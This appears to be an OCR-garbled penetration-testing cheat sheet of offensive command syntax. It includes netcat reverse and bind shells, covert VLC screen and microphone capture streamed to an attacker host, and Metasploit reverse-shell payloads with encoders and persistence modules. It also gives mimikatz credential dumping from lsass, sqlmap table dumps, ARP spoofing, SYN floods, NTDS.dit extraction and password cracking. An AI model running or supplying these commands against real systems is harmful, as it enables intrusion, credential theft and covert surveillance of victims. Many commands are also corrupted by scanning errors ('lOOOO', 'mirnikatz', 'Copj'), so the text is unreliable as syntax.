Tool Syntax

xsltproc nmap.xml -o nmap.html

nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f
5 live hosts.txt

ndiff scanl.xml scan2.xml

nmap -R -sL -dns-server server 1.1.1.0/24

for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done

eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =

and OR &&
or OR ||
xor OR ^^
not OR!

Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]

Start Listener:
$ nc -1 -p [port]

./ncat - l 3128 -proxy -type http &

TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

send file
nc.exe 10.10.10.10 < "file.log"

download file
nc -vnlp 1234 > file.txt

Grab a [filename] from a Listener:
1. Start Listener to push [filename]
     $ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
     $ nc -w3 [TargetiP] [port] [filename]

Push a [filename] to Listener:
1. Start Listener to pull [filename]
     $ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
     $nc -w3 [TargetiP] [port] [filename]

Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

Use cvlc \(command line VLC\) on target to migrate popups

# Start a listener on the attacker machine
vlc udp://@:1234

-- OR --

# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep

# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

# Start a listener on the attacker machine
     vlc http://server.example.org:BOBO

-- OR --

# Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#
transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
rate=44100):file{dst=test.mp4)

# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234

# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys

If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES

ssh root@2.2.2.2 -p 8222

ssh -R 4446:127.0.0.1:3128 master@192.168.2.2
http 127.0.0.1 4446

xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X root@2.2.2.2

ssh -R8080:12-.0.0.1:443 root@2.2.2.2.

ssh -18080:3.3.3.3:443 root@2.2.2.2

ssh -D1080 root@2.2.2.2
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS

sqlmap.py -u "http://url?id=1&str=val"

sqlmap.py -u "http://url" --data="id=1&str=val"

sqlmap.py -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"

1. Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http:// url "--data="id=l&str=val" -p "id"
--cookie="cookiel=vall;cookie2=val2"

./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db
--current-user

sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D
"testdb"

sqlmap.py -u "http://url" --data="id=l&str=val" -p "id" --columns -T
"users"

sqlmap.py -r req.txt

sqlmap -r req -D openemr -T users_secure --dump

sqlmap -r req --technique=T

sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns

./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X
cb.exe

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war

./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1
LPORT=443 callback.exe

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml

--- Kali ---
# service postgresql start
# service metasploit start

msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip 
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID

msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
# RHOSTS
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open

use priv
getsystem

use incognito
list tokens -u
impersonate token domain\\user

1. msf sessions #Note Meterpreter ID
2. msf route add 3.3.3.0 255.255.255.0 id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 127.0.0.1 9050
iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3

meterprete irb
client.railgun.user32.MessageBoxA(O,"got","YOU","MB_OK")

msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set PAYLOAD_TYPE TCPIHTTPIHTPS
msf set REXENAHE filename
msf set SESSION meterpreter session id
msf set STARTUP SERVICE

meterpreter run post/windows/gather/dumplinks

execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'

ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443

ettercap -T -M arp -F filter // //

ettercap -TP rand flood

etterfilter filter.filter -o out.ef

if lip.proto == UDP && udp.dst == 500) I
     drop();
     kill(); }
if I ip.src == 'ip' ) (
     if (tcp.dst == 80) (
         if (search(DATA.data, "Accept-Encoding")) (
             replace("Accept-Encoding","Accept-Rubbish!");
             msg("Replaced Encoding\n");
         }
     }
}

1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords

mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>

#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

hping3 targetiP --flood --frag --spoof ip --destport # --syn

./arping -I eth# -a # arps

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe

GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot

hydra -1 ftp -P words -v targetiP ftp

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

$ ./john -wordfile:pw.lst -format: format hash.txt

$ john --format~des    username:SDbsuge8iC58A
$ john --format~lm     username:$L~$a9c604d244c4e99d
$ john --format~md5    $1$12345678$aiccj83HRD8o6ux1bVx7D1

$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D

# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLM$ll22334455667788$0836F0858124F338958"5F81951905DD2F85252CC7
318825
username:$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC7
318825:::::::

# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT    $8366A4E9E68"2C80
username:ROOT    $8366A4E9E68"2C80

$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239

$ john --format=sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89

$ john --format=zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4

#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt

Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt

generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copj
     a. cscript vssown.vbs /start (optional)
     b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
     a. Copy
     \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
     ntds\ntds.dit.
b. copj
     \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
     System32\config\SYSTEM.
     C. COpj
     \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
     system32\config\SAM.
4. Copj files to attack box.
5. Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
6. Configure and Make source code for libesedb from the extracted package
     a. cd libesdb
     b. chmod +x configure
     c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
     a. cd esedbtools
     b. . I esedbdumphash ../../ntds.dit

MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes

http://isc.sans.edu/tools/hashsearch.html
# dig +short md5 .md5.dshield.org TXT
Result = "filename I source" i.e. "cmd.exe I NIST"

http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'

https://fileadvisor.bit9.com/services/search.aspx

https://www.virustotal.com/#search

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

mssqlclient.py -port 1433 sa@10.10.10.10

powershell iwr -usebasicparsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe

𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑔𝑒𝑡 𝑝𝑜𝑑

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑎𝑢𝑡ℎ 𝑐𝑎𝑛 − 𝑖 𝑒𝑥𝑒𝑐 𝑝𝑜𝑑𝑠

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑒𝑥𝑒𝑐 − 𝑖𝑡 𝑠𝑒𝑛𝑠𝑖𝑡𝑖𝑣𝑒 − 𝑝𝑜𝑑 /𝑏𝑖𝑛/𝑏𝑎𝑠ℎ

kubectl get nodes -o wide

python rsf.py -m discovery

python rsf.py -m vulnerability

python rsf.py -m bruteforce

python rsf.py -m exploit

python rsf.py -m payloads

python rsf.py -m sniffer

python rsf.py -m dos

python rsf.py -m password

python rsf.py -m shodan